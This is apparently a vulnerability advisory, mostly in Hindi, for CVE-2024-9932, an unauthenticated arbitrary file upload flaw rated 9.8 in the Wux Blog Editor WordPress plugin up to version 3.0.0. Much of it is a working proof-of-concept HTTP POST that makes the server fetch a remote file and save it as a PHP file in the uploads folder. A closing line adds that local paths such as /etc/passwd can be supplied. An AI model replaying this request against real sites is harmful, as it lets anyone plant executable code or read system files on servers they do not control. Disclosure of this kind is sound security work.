
Wux Blog Editor <= 3.0.0 - अप्रमाणित मनमानी फ़ाइल अपलोड
Wux Blog Editor <= 3.0.0 - अप्रमाणित मनमानी फ़ाइल अपलोड
WordPress के लिए Wux Blog Editor प्लगइन, संस्करण 3.0.0 तक (और इसमें शामिल), 'wuxbt_insertImageNew' फ़ंक्शन में अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण मनमानी फ़ाइल अपलोड के लिए असुरक्षित है। इससे अप्रमाणित हमलावरों के लिए प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करना संभव हो जाता है, जो संभावित रूप से रिमोट कोड निष्पादन को
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive
{
"url": "https://rfi.nessus.org/rfi.txt",
"imageName": "rf.php",
"image_alt": "Description of the image",
"image_title": "Title of the image"
}
फ़ाइल /wp-content/uploads/2024/11/rf.php में समाप्त हुई।
आप इसे /etc/passwd जैसे फ़ाइल स्थान भी दे सकते हैं।